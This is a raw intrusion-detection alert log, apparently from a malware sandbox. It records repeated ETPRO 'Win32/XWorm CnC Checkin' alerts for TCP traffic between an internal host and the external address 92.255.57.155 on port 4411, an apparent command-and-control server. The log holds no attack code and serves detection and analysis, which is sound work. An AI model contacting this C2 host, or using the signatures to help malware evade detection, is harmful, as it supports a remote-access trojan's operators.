2024-12-29T09:50:13.092410+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:13.204806+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:13.215338+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:13.342990+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:13.347191+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:13.414813+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:13.508742+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:13.545363+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:13.630052+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:14.605324+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:14.664090+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:14.815830+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:14.817332+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:14.874751+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:14.980694+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:15.026044+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:15.106876+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:15.147035+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:15.228324+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:16.090356+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:16.527221+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:16.737455+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:16.796176+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:16.796283+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:16.856975+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:17.067356+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:17.195385+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:17.405988+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:17.476686+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:17.529253+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:17.639428+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:18.574130+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:18.599894+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:18.784637+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:18.814311+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:18.904468+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:18.933617+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:19.263348+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:19.292357+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:20.809032+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:20.837412+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:21.047340+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:21.076005+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:21.496954+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:21.539001+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:21.539311+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:21.656884+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:21.791442+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:22.413793+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:22.416426+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:23.032242+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:23.153286+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:23.218153+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:23.321307+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:23.362255+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:23.440756+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:23.483258+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:23.560131+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:23.651202+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:23.679769+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:23.770698+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:23.801288+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:24.337402+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:24.590080+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:24.826185+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:24.829139+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:24.920019+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:24.948706+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:25.039575+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:25.410895+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:25.454605+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:25.454744+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:25.525094+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:25.735223+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:25.765302+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:26.542763+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:26.616898+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:26.795033+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:26.815774+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:27.005261+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:27.054545+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:27.431716+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:27.432692+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:27.729998+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:27.733196+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:27.984051+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:27.993193+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:28.349203+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:28.647855+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:28.845282+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:28.915978+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:28.964601+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:29.055428+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:29.175074+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:29.175217+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:29.265968+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:29.266101+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:29.336681+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:29.385226+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:29.505083+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:29.567348+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:30.267599+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:30.269550+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:30.933815+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:30.944889+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:31.144316+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:31.173180+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:31.383523+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:31.388108+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:31.503069+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:31.507470+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:31.635012+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:31.635975+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:32.351876+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:32.361841+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:34.011259+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:34.039288+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:34.370884+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:34.691200+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:34.737075+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:34.820320+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:34.910856+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:34.910964+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:35.030635+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:36.402691+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:36.403723+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:36.636705+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:37.028153+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:37.054426+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:37.264888+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:37.269208+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:37.358341+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:37.388514+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:37.718652+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:37.788142+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:38.077885+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:38.081916+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:38.855270+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:38.881240+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:39.065640+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:39.125210+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:39.211108+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:39.245347+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:39.318908+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:39.365182+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:39.421416+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:39.485076+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:39.574975+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:39.604568+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:40.560743+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:40.586807+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:40.797191+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:40.799214+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:40.916824+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:40.918759+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:41.419394+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:41.421216+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:41.631321+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:41.632142+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:42.699143+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:42.725987+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:42.909380+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:43.055664+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:43.124721+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49730	92.255.57.155	4411	TCP
2024-12-29T09:50:43.306431+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	92.255.57.155	4411	192.168.2.4	49730	TCP
